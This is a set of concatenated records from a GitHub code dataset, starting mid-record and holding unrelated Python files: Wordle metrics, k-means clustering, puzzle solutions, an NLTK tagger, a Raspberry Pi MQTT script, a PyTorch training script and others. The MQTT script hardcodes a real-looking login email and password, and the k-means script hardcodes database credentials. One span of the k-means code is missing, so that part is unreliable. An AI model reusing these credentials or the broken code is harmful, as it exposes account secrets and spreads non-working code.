.collect())\n\nprint(arr)\n\n","repo_name":"xchen011/pyspark_avro","sub_path":"test_pyspark.py","file_name":"test_pyspark.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2361178616","text":"\"\"\"Module of metrics for Wordle greedy search algorithm\"\"\"\n\nfrom typing import Union\n\nimport numpy as np\n\nfrom wordle._types import FloatArrayType, IntArrayType, UIntArrayType\n\nResponseDType = Union[np.uint8, np.uint16, np.uint32]\n\n\ndef score(\n metric: str,\n array: UIntArrayType,\n possible_guesses: IntArrayType,\n possible_answers: IntArrayType,\n) -> FloatArrayType:\n \"\"\"\n Score the array of responses on the provided metric,\n given the possible guesses and answers.\n \"\"\"\n return _metrics[metric](array, possible_guesses, possible_answers)\n\n\ndef _expected_value(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the expected number of possible answers for each possible guess, given\n an existing set of possible answers, corrected for the possibility that the guess\n can be correct.\n \"\"\"\n mean_num_left = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n _, counts = np.unique(row, return_counts=True) # type: ignore\n mean_num_left.append(counts.dot(counts))\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return (np.array(mean_num_left) - can_be_correct) / array.shape[1] # type: ignore\n\n\ndef _minimax(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the maximum number of possible answers for each possible guess, given\n an existing set of possible answers. The possibility that the guess can be correct\n is used as a potential tiebreaker. See also:\n https://en.wikipedia.org/wiki/Minimax\n \"\"\"\n max_num_left = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n _, counts = np.unique(row, return_counts=True) # type: ignore\n max_num_left.append(counts.max())\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return np.array(max_num_left) - can_be_correct * 0.1 # type: ignore\n\n\ndef _partitions(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the number of possible responses for each possible guess, given\n an existing set of possible answers. This is negated since we want to maximize this, i.e.\n we'd like to spread out the possible answers into as many groups as possible. The\n possibility that the guess can be correct is used as a potential tiebreaker.\n \"\"\"\n partitions = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n partitions.append(np.unique(row).shape[0]) # type: ignore\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return -np.array(partitions) - can_be_correct * 0.1 # type: ignore\n\n\ndef _entropy(\n array: UIntArrayType, possible_guesses: IntArrayType, _unused: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the Shannon entropy of the probability distribution of responses for each guess, given\n an existing set of possible answers. Shannon entropy can be thought of as the average level of \"information\"\n contained in a response, so this is negated since we want to maximize this. See also:\n https://en.wikipedia.org/wiki/Entropy_(information_theory)\n \"\"\"\n entropies = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n _, counts = np.unique(row, return_counts=True) # type: ignore\n probs = counts / row.shape[0]\n entropies.append(probs.dot(np.log(probs)))\n return np.array(entropies)\n\n\n_metrics = {\n \"expected_value\": _expected_value,\n \"minimax\": _minimax,\n \"partitions\": _partitions,\n \"entropy\": _entropy,\n}\n","repo_name":"matteosox/sundry-musings","sub_path":"src/wordle/_metrics.py","file_name":"_metrics.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32407478005","text":"\"\"\"\nCS591\nProject 2\n11.12.17\ngetKmeansNY.py\n\"\"\"\nimport urllib.request\nimport json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\nimport requests\nimport math\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport random\n\n#prevents deprecation warnings, a known and fixed issue\n#(see https://stackoverflow.com/questions/36892390/deprecationwarning-in-sklearn-minibatchkmeans)\nimport warnings \nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\n\n\n#our algorithm\nclass FindKMeans():\n #the largest acceptable distance between two data \n \n coordinates = []\n\n def __init__(self,distance):\n # convert miles input to lat/long degrees\n self.acceptableDistance = distance / 69 # 1° ≈ 69 miles\n\n #takes all the coordinates and the kmeans cluster and returns the highest distance between\n #any point and its respective centroid \n def getMaxDistance(self,kmeans, coordinates):\n maxDistance = 0\n for i in range(len(coordinates)):\n\n clusterCenter = kmeans.predict([coordinates[i]])\n\n current = self.distance(kmeans.cluster_centers_[clusterCenter][0],coordinates[i])\n\n if(current > maxDistance):\n maxDistance = current\n return maxDistance\n\n def getAvgDistance(self,kmeans, coordinates):\n totalDistance = 0\n for i in range(len(coordinates)):\n clusterCenter = kmeans.predict([coordinates[i]])\n totalDistance += self.distance(kmeans.cluster_centers_[clusterCenter][0],coordinates[i])\n return totalDistance/len(coordinates)\n \n #returns the distance between two long/lat points\n def distance(self,p0, p1):\n return math.sqrt((p0[0] - p1[0])**2 + (p0[1] - p1[1])**2)\n\n\n def execute(self,toggle,trial = False):\n #param: toggle - true for average or false for max distance\n '''Retrieve crime incident report information from Boston.'''\n startTime = datetime.datetime.now()\n #print('Finding optimal number of means')\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('alanbur_aquan_erj826_jcaluag', 'alanbur_aquan_erj826_jcaluag') \n repo.dropCollection(\"alanbur_aquan_erj826_jcaluag.kMeansNY\")\n repo.createCollection(\"alanbur_aquan_erj826_jcaluag.kMeansNY\")\n\n #get coordinates from colleciton\n collection = repo.alanbur_aquan_erj826_jcaluag.parseNYaccidents\n\n coordinates = []\n\n for entry in collection.find():\n try: #make the array for kmeans\n datapoint = [entry['latitude'],entry['longitude']]\n coordinates.append(datapoint)\n except:\n continue\n\n SampleSize=100\n if trial:\n TrialSample=coordinates[:SampleSize]\n for i in range(SampleSize+1,len(coordinates)):\n j=random.randint(1,i)\n if j self.acceptableDistance):\n #print(\"the metric is: \" + str(metric))\n clusters+=1\n kmeans = KMeans(n_clusters=clusters, random_state=0).fit(X) \n if(avgOrMaxDistToggle):\n metric = self.getAvgDistance(kmeans,coordinates)\n else:\n\n metric = self.getMaxDistance(kmeans,coordinates)\n # print(\"we're done! the \" + str({True: \"avg\", False: \"max\"} [avgOrMaxDistToggle])+ \" distance is: \" + str(metric) + \" at \" + str(clusters) + \" clusters!\")\n \n #plug into the centroids into dictionary for returning\n n=[]\n centroids = kmeans.cluster_centers_.tolist()\n for each in centroids:\n n += [each]\n\n # return centroids\n # print(repo['alanbur_aquan_erj826_jcaluag.kMeansNY'].metadata())\n repo.logout()\n endTime = datetime.datetime.now()\n\n return n\n\n\n\n\n\n\n# FindKMeans.execute(False)\n\n## eof\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"alanbur_aquan_erj826_jcaluag/find_kmeans.py","file_name":"find_kmeans.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"43267306593","text":"from typing import List\n\nclass Solution:\n def longestOnes(self, nums: List[int], k: int) -> int:\n # 需要注意的是sliding window, 当zeros 超过k,不是一下reset,而是一步一步挪动l\n if not nums:\n return 0\n l = 0\n zeros = 0\n res = 0\n for i in range(len(nums)):\n if not nums[i]:\n zeros += 1\n \n while l <= i and zeros > k:\n if not nums[l]:\n zeros -= 1\n l += 1\n\n # 计算这个长度的时候要注意应该是i-l+1\n # 比如[1, 2]那么idx 算长度就是 1-0+1 = 2\n res = max(i - l + 1, res)\n \n return res","repo_name":"latree/leetcode","sub_path":"Array/max_consecutive_ones_iii.py","file_name":"max_consecutive_ones_iii.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23424524341","text":"#!/usr/bin/env python3\n\ndef meilleur(C, F, X):\n\tR = 2.0\n\tderniere_ferme = 0.0\n\tmeilleur = X / R\n\n\twhile True:\n\t\tderniere_ferme += C / R\n\t\tR += F\n\t\tcandidat = derniere_ferme + X / R\n\n\t\tif candidat < meilleur:\n\t\t\tmeilleur = candidat\n\n\t\telse:\n\t\t\tbreak\n\n\treturn meilleur\n\nT = int(input())\n\nfor i in range(T):\n\tC, F, X = map(float, input().split())\n\tprint(\"Case #{}: {}\".format(i + 1, meilleur(C, F, X)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2315.py","file_name":"2315.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36068592208","text":"import nltk\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.corpus import wordnet as wn\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.data import load\n\nimport re\n\nfrom tkinter import *\n\nroot = Tk()\n\ntxt = StringVar()\ntxt.set(\"This all happened because of you, scientists!\")\nres = StringVar()\n\nlemmatizer = WordNetLemmatizer()\ntag_dict = {\n \"JJ\": wn.ADJ,\n \"JJR\": wn.ADJ,\n \"JJS\": wn.ADJ,\n \"NN\": wn.NOUN,\n \"NNP\": wn.NOUN,\n \"NNS\": wn.NOUN,\n \"NNPS\": wn.NOUN,\n \"VB\": wn.VERB,\n \"VBN\": wn.VERB,\n \"VBG\": wn.VERB,\n \"VBZ\": wn.VERB,\n \"VBP\": wn.VERB,\n \"VBD\": wn.VERB,\n \"RB\": wn.ADV,\n \"RBR\": wn.ADV,\n \"RBS\": wn.ADV,\n }\n\ndef pos_tag_sentence(sent):\n postgs = nltk.pos_tag(nltk.word_tokenize(sent))\n rtgs = list()\n i = 0\n pos = 1\n while i < len(postgs):\n pt = postgs[i]\n if re.search(r\"[A-Za-z]+\", pt[0]) != None:\n lemma = str()\n if pt[1] in tag_dict:\n lemma = lemmatizer.lemmatize(pt[0], pos=tag_dict.get(pt[1]))\n else:\n lemma = lemmatizer.lemmatize(pt[0])\n rtgs.append([lemma.upper(), pt[1], pos])\n pos += 1\n i += 1\n return rtgs\n\ntagdict = load('help/tagsets/upenn_tagset.pickle')\n\ndef tag_text():\n sentences = nltk.sent_tokenize(txt.get())\n out = str()\n for sent in sentences:\n out += \"--- Sentence: {}\\n\".format(sent)\n tsent = pos_tag_sentence(sent)\n i = 0\n tsent = sorted(tsent, key = lambda s: s[0])\n while i < len(tsent):\n pt = tsent[i]\n out += \"{} -- {}({}). Position: {}\\n\".format(pt[0], pt[1], tagdict[pt[1]][0], pt[2])\n i += 1\n res.set(out)\n\nhelpmsg = str()\nfor key in tagdict.keys():\n helpmsg += \"* {} -- {}\\nExamples: {}\\n\".format(key, tagdict[key][0], tagdict[key][1])\n\ndef help_window():\n children = Toplevel(root)\n children.title('Help')\n\n\n text = Text(children, height=20, width=100)\n scroll = Scrollbar(children)\n scroll.pack(side=RIGHT, fill=Y)\n text.pack(side=LEFT, fill=Y)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n text.insert(END, helpmsg)\n\nroot.title(\"Sentence analyzer\")\nroot.geometry(\"700x600\")\n\nentry = Entry(width=70, textvariable=txt)\nentry.place(relx=.5, rely=.1, anchor=\"c\")\n\nbutton = Button(text=\"Tag text\", command=tag_text)\nbutton.place(relx=.5, rely=.2, anchor=\"c\")\n\nresultlabel = Label(textvariable=res, justify=LEFT)\nresultlabel.place(relx=.5, rely=.3, anchor=\"n\")\n\nhelp = Button(text=\"Help\", command=lambda: help_window())\nhelp.place(relx=.5, rely=.8, anchor=\"c\")\n\nroot.mainloop()\n","repo_name":"PlagaMedicum/pos-glossary-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13148936794","text":"import paho.mqtt.client as mqtt \nimport time\nimport RPi.GPIO as GPIO\nimport datetime\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(19,GPIO.IN)\nGPIO.setup(20,GPIO.IN)\n\ndef on_message(client,obj,msg):\n\tmensaje=(msg.payload.decode(\"utf-8\"))\n\tif mensaje==\"s1\":\n\t\tprint(\"historial1\")\n\t\tf=open(\"sensor1\",\"r\")\n\t\tmen1= f.read()\n\t\tmqttc.publish(\"mdpilatuna.fie@unach.edu.ec/WEB\", men1)\n\telif mensaje==\"s2\":\n\t\tprint(\"historial2\")\n\t\tg=open(\"sensor2\",\"r\")\n\t\tmen2= g.read()\n\t\tmqttc.publish(\"mdpilatuna.fie@unach.edu.ec/WEB\", men2)\n\nmqttc = mqtt.Client() \nmqttc.on_message = on_message \nmqttc.username_pw_set(\"mdpilatuna.fie@unach.edu.ec\",\"quitociudadhermosa\") \nmqttc.connect(\"maqiatto.com\", 1883) \nmqttc.subscribe(\"mdpilatuna.fie@unach.edu.ec/RASP\", 0)\nrc=0\nprint(\"inicio...\")\ni = 0\nwhile rc == 0:\n\thora=datetime.datetime.now().strftime('%H:%M:%S')\n\ttime.sleep(3)\n\trc = mqttc.loop()\n\tif GPIO.input(19):\n\t\testado1=\"Encendido\"\n\t\tGPIO.output(17,True)\n\telse: \n\t\testado1=\"Apagado\"\n\t\tGPIO.output(17,False)\n\tif GPIO.input(20):\n\t\testado2=\"Encendido\"\n\t\tGPIO.output(18,True)\n\telse: \n\t\testado2=\"Apagado\"\n\t\tGPIO.output(18,False)\n\tf=open(\"sensor1\",\"w\")\n\tf.write(\"Sensor1 \"+estado1+\"a las\" + hora)\n\tf.close()\n\tg=open(\"sensor2\",\"w\")\n\tg.write(\"Sensor2 \"+estado2+\"a las\" + hora)\n\tg.close()","repo_name":"mauricio2020dani/examen","sub_path":"templates/new 1.py","file_name":"new 1.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42815499505","text":"from locust import HttpUser, task, between\n\nclass MyUser(HttpUser):\n wait_time = between(3, 5)\n host = \"https://localhost:8089/\"\n\n @task(1)\n def connectivity_test(self):\n self.client.get(\"https://azureflaskprediction.azurewebsites.net/predict\")\n\n @task(2)\n def prediction_test(self):\n payload = {\n \"CHAS\": {\"0\": 0},\n \"RM\": {\"0\": 6.575},\n \"TAX\": {\"0\": 296.0},\n \"PTRATIO\": {\"0\": 15.3},\n \"B\": {\"0\": 396.9},\n \"LSTAT\": {\"0\": 4.98}\n }\n response = self.client.post(\n \"/predict\", json=payload, headers={'Content-Type': 'application/json'})","repo_name":"selimkayali/flask-ml-service","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25521212568","text":"import geopandas\nimport folium\nimport folium.plugins as plugins\n\ngeo_path = '/tmp/regional-soils-a-xrf.geojson'\nrows = []\npopups = []\n\ndef latlong(row):\n rows.append([row.geometry.y, row.geometry.x])\n popups.append(\"Fe2 O3: %lf\" % row.Fe2O3)\n\ngdf = geopandas.GeoDataFrame.from_file(geo_path).to_crs(epsg='4326')\ngdf.apply(latlong, axis=1)\n\nice_map = folium.Map(location=[55, -6],\n tiles='cartodbpositron', zoom_start=10)\nice_map.add_children(plugins.MarkerCluster(locations=rows, popups=popups))\nice_map.save('soils.html')\n","repo_name":"flaxandteal/python-course","sub_path":"011-geography/python/gpa.py","file_name":"gpa.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"70264259076","text":"import logging\nimport os\nfrom pathlib import Path\n\nfrom codetiming import Timer\nfrom knockknock import slack_sender\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nfrom tqdm.contrib.logging import logging_redirect_tqdm\nimport typer\nimport yaml\n\nfrom ml_downscaling_emulator.unet import unet\nfrom mlde_utils.training import log_epoch, track_run, save_checkpoint\nfrom mlde_utils.torch import get_dataloader\n\nUNET_ARCHNAME = \"u-net\"\nSIMPLE_CONV_ARCHNAME = \"simple-conv\"\nEXPERIMENT_NAME = os.getenv(\"WANDB_EXPERIMENT_NAME\")\nTAGS = {\n UNET_ARCHNAME: [\"baseline\", UNET_ARCHNAME],\n SIMPLE_CONV_ARCHNAME: [\"baseline\", SIMPLE_CONV_ARCHNAME, \"debug\"],\n}\n\napp = typer.Typer()\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\",\n)\nlogger = logging.getLogger()\nlogger.setLevel(\"INFO\")\n\n\n@app.command()\n@Timer(name=\"train\", text=\"{name}: {minutes:.1f} minutes\", logger=logging.info)\n@slack_sender(webhook_url=os.getenv(\"KK_SLACK_WH_URL\"), channel=\"general\")\ndef main(\n workdir: Path,\n dataset: str = typer.Option(...),\n epochs: int = 200,\n learning_rate: float = 2e-4,\n batch_size: int = 64,\n snapshot_freq: int = 25,\n input_transform_key: str = \"v1\",\n target_transform_key: str = \"v1\",\n):\n\n run_config = dict(\n dataset=dataset,\n input_transform_key=input_transform_key,\n target_transform_key=target_transform_key,\n batch_size=batch_size,\n epochs=epochs,\n architecture=\"u-net\",\n loss=\"MSELoss\",\n optimizer=\"Adam\",\n device=(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n )\n\n run_name = workdir.name\n\n os.makedirs(workdir, exist_ok=True)\n\n gfile_stream = open(os.path.join(workdir, \"stdout.txt\"), \"w\")\n handler = logging.StreamHandler(gfile_stream)\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n # Create transform saving directory\n transform_dir = os.path.join(workdir, \"transforms\")\n os.makedirs(transform_dir, exist_ok=True)\n\n # Create directories for experimental logs\n sample_dir = os.path.join(workdir, \"samples\")\n os.makedirs(sample_dir, exist_ok=True)\n\n tb_dir = os.path.join(workdir, \"tensorboard\")\n os.makedirs(tb_dir, exist_ok=True)\n\n logging.info(f\"Starting {os.path.basename(__file__)}\")\n\n # Create checkpoints directory\n checkpoint_dir = os.path.join(workdir, \"checkpoints\")\n os.makedirs(checkpoint_dir, exist_ok=True)\n # Intermediate checkpoints to resume training after pre-emption in cloud environments\n checkpoint_meta_dir = os.path.join(workdir, \"checkpoints-meta\", \"checkpoint.pth\")\n os.makedirs(os.path.dirname(checkpoint_meta_dir), exist_ok=True)\n\n device = torch.device(run_config[\"device\"])\n logging.info(f\"Using device {device}\")\n\n # Build dataloaders\n train_dl, _, _ = get_dataloader(\n dataset,\n dataset,\n input_transform_key,\n target_transform_key,\n transform_dir,\n batch_size=batch_size,\n split=\"train\",\n evaluation=False,\n )\n val_dl, _, _ = get_dataloader(\n dataset,\n dataset,\n input_transform_key,\n target_transform_key,\n transform_dir,\n batch_size=batch_size,\n split=\"val\",\n evaluation=False,\n )\n\n # Setup model, loss and optimiser\n num_predictors, _, _ = train_dl.dataset[0][0].shape\n model = unet.UNet(num_predictors, 1).to(device=device)\n if run_config[\"loss\"] == \"MSELoss\":\n criterion = torch.nn.MSELoss().to(device)\n else:\n raise NotImplementedError(f'Loss {run_config[\"loss\"]} not supported yet!')\n\n if run_config[\"optimizer\"] == \"Adam\":\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n else:\n raise NotImplementedError(\n f'Optimizer {run_config[\"optimizer\"]} not supported yet!'\n )\n\n state = dict(optimizer=optimizer, model=model, step=0, epoch=0)\n\n initial_epoch = int(state[\"epoch\"])\n step = state[\"step\"]\n\n def loss_fn(model, batch, cond):\n return criterion(model(cond), batch)\n\n def optimize_fn(optimizer, params, step, lr, warmup=5000, grad_clip=1.0):\n \"\"\"Optimizes with warmup and gradient clipping (disabled if negative).\"\"\"\n if warmup > 0:\n for g in optimizer.param_groups:\n g[\"lr\"] = lr * np.minimum(step / warmup, 1.0)\n if grad_clip >= 0:\n torch.nn.utils.clip_grad_norm_(params, max_norm=grad_clip)\n optimizer.step()\n\n # Compute validation loss\n def eval_step_fn(state, batch, cond):\n \"\"\"Running one step of training or evaluation.\n\n This function will undergo `jax.lax.scan` so that multiple steps can be pmapped and jit-compiled together\n for faster execution.\n\n Args:\n state: A dictionary of training information, containing the score model, optimizer,\n EMA status, and number of optimization steps.\n batch: A mini-batch of training/evaluation data to model.\n cond: A mini-batch of conditioning inputs.\n\n Returns:\n loss: The average loss value of this state.\n \"\"\"\n model = state[\"model\"]\n with torch.no_grad():\n loss = loss_fn(model, batch, cond)\n\n return loss\n\n def train_step_fn(state, batch, cond):\n \"\"\"Running one step of training or evaluation.\n\n This function will undergo `jax.lax.scan` so that multiple steps can be pmapped and jit-compiled together\n for faster execution.\n\n Args:\n state: A dictionary of training information, containing the score model, optimizer,\n EMA status, and number of optimization steps.\n batch: A mini-batch of training/evaluation data to model.\n cond: A mini-batch of conditioning inputs.\n\n Returns:\n loss: The average loss value of this state.\n \"\"\"\n model = state[\"model\"]\n optimizer = state[\"optimizer\"]\n optimizer.zero_grad()\n loss = loss_fn(model, batch, cond)\n loss.backward()\n optimize_fn(optimizer, model.parameters(), step=state[\"step\"], lr=learning_rate)\n state[\"step\"] += 1\n\n return loss\n\n # save the config\n config_path = os.path.join(workdir, \"config.yml\")\n with open(config_path, \"w\") as f:\n yaml.dump(run_config, f)\n\n with track_run(\n EXPERIMENT_NAME, run_name, run_config, TAGS[run_config[\"architecture\"]], tb_dir\n ) as (wandb_run, tb_writer):\n # Fit model\n wandb_run.watch(model, criterion=criterion, log_freq=100)\n\n logging.info(\"Starting training loop at epoch %d.\" % (initial_epoch,))\n\n for epoch in range(initial_epoch, epochs + 1):\n # Update model based on training data\n model.train()\n\n train_set_loss = 0.0\n with logging_redirect_tqdm():\n with tqdm(\n total=len(train_dl.dataset),\n desc=f\"Epoch {epoch}\",\n unit=\" timesteps\",\n ) as pbar:\n for (cond_batch, x_batch) in train_dl:\n cond_batch = cond_batch.to(device)\n x_batch = x_batch.to(device)\n ###################\n # CURRENT VERSION #\n ###################\n # # Compute prediction and loss\n # outputs_tensor = model(cond_batch)\n # train_batch_loss = criterion(outputs_tensor, x_batch)\n # train_set_loss += train_batch_loss.item()\n\n # # Backpropagation\n # optimizer.zero_grad()\n # train_batch_loss.backward()\n # optimizer.step()\n\n #####################\n # SCORE_SDE VERSION #\n #####################\n train_batch_loss = train_step_fn(state, x_batch, cond_batch)\n train_set_loss += train_batch_loss.item()\n\n #######\n # END #\n #######\n\n # Log progress so far on epoch\n pbar.update(cond_batch.shape[0])\n\n step += 1\n train_set_loss = train_set_loss / len(train_dl)\n\n model.eval()\n val_set_loss = 0.0\n for val_cond_batch, val_x_batch in val_dl:\n # eval_cond_batch, eval_x_batch = next(iter(eval_ds))\n val_x_batch = val_x_batch.to(device)\n val_cond_batch = val_cond_batch.to(device)\n # eval_batch = eval_batch.permute(0, 3, 1, 2)\n val_batch_loss = eval_step_fn(state, val_x_batch, val_cond_batch)\n\n # Progress\n val_set_loss += val_batch_loss.item()\n val_set_loss = val_set_loss / len(val_dl)\n\n epoch_metrics = {\"train/loss\": train_set_loss, \"val/loss\": val_set_loss}\n log_epoch(epoch, epoch_metrics, wandb_run, tb_writer)\n # Checkpoint model\n if (epoch != 0 and epoch % snapshot_freq == 0) or epoch == epochs:\n checkpoint_path = os.path.join(checkpoint_dir, f\"epoch_{epoch}.pth\")\n save_checkpoint(checkpoint_path, state)\n logging.info(f\"epoch: {epoch}, checkpoint saved to {checkpoint_path}\")\n\n logging.info(f\"Finished {os.path.basename(__file__)}\")\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"henryaddison/ml-downscaling-emulation","sub_path":"bin/train-model.py","file_name":"train-model.py","file_ext":"py","file_size_in_byte":9655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23387682101","text":"import sys\n\nsys.stdin = open('B-small-0.in', 'r')\nsys.stdout = open('B-small-0.out', 'w')\n\nT = int(input())\n\n\ndef solution():\n N,M = map(int, input().split())\n a = [list(map(int, input().split())) for i in range(N)]\n ar = [[a[i][j] for i in range(N)] for j in range(M)]\n\n for i in range(N):\n for j in range(M):\n if a[i][j] == 1:\n if (a[i] != [1] * M) and (ar[j] != [1] * N):\n return \"NO\"\n return \"YES\"\n\nfor test in range(T):\n test += 1\n print(\"Case #%03d:\" % test, end = ' ', file = sys.stderr)\n print(\"Case #%d: %s\" % (test, solution()))\n print(\"OK\", file = sys.stderr)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1652.py","file_name":"1652.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31124076312","text":"from pathlib import Path\nfrom typing import Generic, TypeVar\n\nCURRENT_DIR = Path(__file__).absolute().parent\n\nSourceT = TypeVar(\"SourceT\")\n\n\nclass Fixtureable(Generic[SourceT]):\n fixture_name: str | None = None\n\n def __init_subclass__(cls) -> None:\n if cls.test_fixture != Fixtureable.test_fixture:\n raise ValueError(\"You are not allowed to override test_fixture method\")\n if cls._get_fixture != Fixtureable._get_fixture:\n raise ValueError(\"You are not allowed to override `_get_fixture` method\")\n if cls._run_fixture != Fixtureable._run_fixture:\n raise ValueError(\"You are not allowed to override `_run_fixture` method\")\n if cls._cleanup != Fixtureable._cleanup:\n raise ValueError(\"You are not allowed to override `_cleanup` method\")\n\n if cls.process == Fixtureable.process:\n raise NotImplementedError(\"You must override `process` method\")\n\n def _get_fixture(self):\n if self.fixture_name is None:\n raise ValueError(\"Fixture name is not defined\")\n fixture_path = CURRENT_DIR / f\"{self.fixture_name}\"\n if not fixture_path.exists():\n raise FileNotFoundError(f\"Fixture path {self.fixture_name} is not found\")\n\n source = fixture_path / \"source.tmfxture\"\n expcets = fixture_path / \"expects.tmfxture\"\n if not source.exists():\n raise FileNotFoundError(f\"Fixture source {source} is not found\")\n\n return source, expcets\n\n def _run_fixture(self):\n source, expcets = self._get_fixture()\n proc_result = self.process(source)\n return proc_result, expcets\n\n def _cleanup(self):\n fixture_path = CURRENT_DIR / f\"{self.fixture_name}\"\n if not fixture_path.exists():\n raise FileNotFoundError(f\"Fixture path {self.fixture_name} is not found\")\n\n intermediate = fixture_path / \"intermediate\"\n intermediate_fx = fixture_path / \"intermediate.tmfxture\"\n intermediate.unlink(missing_ok=True)\n intermediate_fx.unlink(missing_ok=True)\n\n def process(self, source: Path) -> SourceT:\n raise NotImplementedError\n\n def assertion_test(self, result: SourceT):\n raise NotImplementedError\n\n def test_fixture(self):\n result, expect_path = self._run_fixture()\n self._cleanup()\n if expect_path.exists():\n expect_bytes = expect_path.read_bytes()\n assert result == expect_bytes\n else:\n try:\n self.assertion_test(result)\n except NotImplementedError as ner:\n raise FileNotFoundError(\n f\"Fixture expects {expect_path} is not found, and assertion_test is not overriden\"\n ) from ner\n","repo_name":"noaione/tosho-mango","sub_path":"tests/fixtures/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40474564733","text":"from __future__ import print_function\nimport sys\nimport math\nimport lwvlib\nimport numpy as np\nfrom Bio import pairwise2\n\ndef edist(w,nearest,wv):\n \"\"\" w - words, nearest - indices into wv \"\"\"\n for nn in nearest:\n nn_word=wv.words[nn]\n if abs(len(w)-len(nn_word))>2:\n continue\n score=pairwise2.align.globalxx(w,wv.words[nn],score_only=True)\n err=max(len(w),len(nn_word))-score\n if err>2 or err==0:\n continue\n print(err,w.encode(\"utf-8\"),nn_word.encode(\"utf-8\"),sep=\"\\t\")\n \n\nif __name__==\"__main__\":\n batch=200\n K=10\n wv=lwvlib.load(\"/home/ginter/w2v/pb34_wf_200_v2.bin\",1500000,1500000)\n np.divide(wv.vectors, wv.norm_constants[:,None], wv.vectors)\n vectors=wv.vectors\n for i in range(0,vectors.shape[0],batch):\n sims=vectors[i:i+batch,:].dot(vectors.T)\n top_K=np.argpartition(sims,sims.shape[1]-K)[:,-K:] #words x K-1 indices of the nearest elements\n top_K_sims=sims[np.arange(batch)[:, None], top_K]\n #print(top_K_sims)\n argsorted=np.argsort(-top_K_sims)\n top_K_sorted=top_K[np.arange(batch)[:, None], argsorted]\n for w,nearest in zip(wv.words[i:i+batch],top_K_sorted):\n edist(w,nearest,wv)\n print(i,file=sys.stderr)\n sys.stdout.flush()\n sys.stderr.flush()\n\n","repo_name":"fginter/wv_spellcheck","sub_path":"sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25911787113","text":"import json\n\nfrom app.domain import BinaryResponse\nfrom app.rest.authentication import AuthenticatedHandlerBase\n\n\nclass DecisionHandlers:\n def __init__(self, decision_service, user_service):\n self.services = dict(\n decision_service=decision_service,\n user_service=user_service\n )\n self.handlers = [\n (r\"/decision/initial\", RequestInitialDecisionHandler, self.services),\n (r\"/decision/activity\", RequestActivityDecisionHandler, self.services)\n ]\n\n\nclass RequestInitialDecisionHandler(AuthenticatedHandlerBase):\n\n def initialize(self, decision_service, user_service):\n super(RequestInitialDecisionHandler, self).initialize(user_service)\n self.decision_service = 